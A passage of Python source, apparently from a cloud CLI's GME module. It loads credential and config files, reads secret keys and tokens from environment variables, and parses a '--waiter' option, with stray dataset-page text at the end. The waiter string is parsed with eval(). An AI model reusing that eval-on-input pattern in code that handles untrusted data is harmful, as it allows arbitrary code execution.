cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.SysParam][OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not (g_param[OptionsDefine.UseCVMRole.replace('-', '_')]
or os.getenv(OptionsDefine.ENV_TKE_ROLE_ARN)):
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output, OptionsDefine.Language]:
if param in conf[OptionsDefine.SysParam]:
g_param[param] = conf[OptionsDefine.SysParam][param]
elif param != OptionsDefine.Language:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["gme"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["gme"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['interval'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param | PypiClean |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.